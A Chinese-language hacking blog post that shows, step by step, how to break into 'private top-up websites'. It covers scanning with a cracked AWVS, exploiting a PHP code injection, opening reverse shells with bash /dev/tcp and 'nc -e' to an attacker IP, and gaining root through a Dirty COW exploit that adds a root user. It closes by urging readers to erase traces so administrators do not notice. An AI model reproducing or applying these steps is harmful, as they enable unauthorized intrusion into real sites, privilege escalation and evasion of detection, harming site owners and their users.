快乐赚

怎么破解私人充值网站(黑客入门之三步攻破常见网站)

 人阅读 | 作者舞动奇迹 | 时间:2023-08-08 11:44

本次要攻破的是常见的网站,网站界面如下图所示

 

 

操作过程

一般遇到常见的网站,我们通常会用扫描器扫描其漏洞(手动挖掘太慢),常见的扫描器有AWVS、AppScan、webinspect、burpsuite、nikto等。这几款产品各有优劣,但一般使用最多的是AWVS,这里也以AWVS为例。

一、AWVS安装

首先去AWVS官网下载AWVS,目前AWVS支持Windows、Linux版本,这里使用的是Linux版本。由于AWVS下载的是一个Shell脚本,直接执行该脚本即可安装成功,但由于AWVS是商业产品,如果不破解的话,不会展示详细的漏洞信息,具体破解方法可自行百度,这里不多做赘述,如有条件,建议支持正版。

 

 

二、网站扫描

1、登录AWVS

 

 

2、创建扫描目标

 

 

3、填写扫描类型

 


 

4、得到扫描结果

 

 

5、查看扫描出的网站漏洞,发现有Php code injection 高危漏洞,后面我们可以以这个漏洞为切入点,进行攻击

 

 

三、攻击开始

1、点进去漏洞详情介绍,发现详细介绍了漏洞详细信息,以及如何触发漏洞

 

 

2、模拟该HTTP请求,发现命令可正常执行

 

 

3、这时了解php的同学应该就知道,php可以用system调用系统命令执行,简单执行个ls -l命令,如下图所示

 

 

4、这时可以尝试使用反弹shell了,执行以前执行过的反弹shell命令

自己本地机器执行如下命令:

nc -v -l -p 4444

目标网站执行如下命令

bash -i >& /dev/tcp/192.168.137.133/4444 0>&1

 

 

但发现没有生效,远程网站的shell并没有反弹回来,具体原因容我先卖个关子,到结尾在进行介绍,现在再尝试使用其它命令

nc 192.168.137.133 4444 -e /bin/bash

 

 

此时发现反弹shell成功

 

 

此处教大家个小技巧,由于反弹shell的终端不是交互方式,可用如下命令变成交互式的。

python -c "import pty;pty.spawn('/bin/bash')"

效果如下图

 

 

四、利用脏牛漏洞

执行uname -a,发现该Linux内核版本较低,github上能查到公开的脏牛漏洞的POC,地址如下:
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

下载该Poc,进行编译执行,如下图所示

执行:

gcc -pthread dirty.c -o dirty -lcrypt

./dirty

 

 

最后生成firefart用户,该用户实际是root用户,密码是自己设置的test1234,记得坏事做完后,要记得把留下的痕迹清理干净,然后执行 mv /tmp/passwd.bak /etc/passwd,这样才不会被管理员发现哦。

 

 

备注:当登录到这台机器上,才发现为什么bash反弹shell命令没有执行,因为/dev/tcp目录根本不存在,所以才会一直反弹不成功

 

 



文章标签:

本文链接:『转载请注明出处』